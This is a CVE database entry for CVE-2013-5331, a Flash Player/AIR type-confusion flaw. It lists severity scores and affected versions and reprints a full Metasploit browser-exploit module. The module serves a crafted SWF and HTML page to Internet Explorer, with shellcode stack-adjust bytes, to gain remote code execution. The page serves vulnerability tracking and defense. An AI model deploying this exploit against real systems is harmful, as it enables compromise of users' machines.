CVE-2013-5331 : Detail

CVE-2013-5331

Code Injection
A03-Injection
95.99%V3
Network
2013-12-11
14h00 +00:00
2018-01-08
20h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Adobe Flash Player before 11.7.700.257 and 11.8.x and 11.9.x before 11.9.900.170 on Windows and Mac OS X and before 11.2.202.332 on Linux, Adobe AIR before 3.9.0.1380, Adobe AIR SDK before 3.9.0.1380, and Adobe AIR SDK & Compiler before 3.9.0.1380 allow remote attackers to execute arbitrary code via crafted .swf content that leverages an unspecified "type confusion," as exploited in the wild in December 2013.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 33095

Publication date : 2014-04-28 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player Type Confusion Remote Code Execution", 'Description' => %q{ This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 over Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery and exploit in the wild 'bannedit', # Exploit in the wild discoverer, analysis and reporting 'juan vazquez' # msf module ], 'References' => [ [ 'CVE', '2013-5331' ], [ 'OSVDB', '100774'], [ 'BID', '64199'], [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb13-28.html' ], [ 'URL', 'http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html' ] ], 'Payload' => { 'Space' => 2000, 'DisableNops' => true, 'PrependEncoder' => stack_adjust }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', 'Retries' => false, 'EXITFUNC' => "thread" }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", :method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^11\.[7|8|9]/ && ver < '11.9.900.170' } }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Dec 10 2013", 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status("Sending SWF...") send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) return end print_status("Sending HTML...") tag = retrieve_tag(cli, request) profile = get_profile(tag) profile[:tried] = false unless profile.nil? # to allow request the swf print_status("showme the money") send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" flash_payload = "" get_payload(cli,target_info).unpack("V*").each do |i| flash_payload << "0x#{i.to_s(16)}," end flash_payload.gsub!(/,$/, "") html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=flash_payload%>" /> <param name="Play" value="true" /> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-5331", "Exploit.swf" ) swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end

Products Mentioned

Configuraton 0

Adobe>>Flash_player >> Version From (including) 11.0 To (excluding) 11.7.700.257

Adobe>>Flash_player >> Version From (including) 11.8 To (excluding) 11.8.800.175

Adobe>>Flash_player >> Version From (including) 11.9 To (excluding) 11.9.900.700

Apple>>Mac_os_x >> Version -

Microsoft>>Windows >> Version -

Configuraton 0

Adobe>>Flash_player >> Version From (including) 11.0 To (excluding) 11.2.202.332

Linux>>Linux_kernel >> Version -

Configuraton 0

Adobe>>Air >> Version To (excluding) 3.9.0.1380

Adobe>>Air_sdk >> Version To (excluding) 3.9.0.1380

References

http://rhn.redhat.com/errata/RHSA-2013-1818.html
Tags : vendor-advisory, x_refsource_REDHAT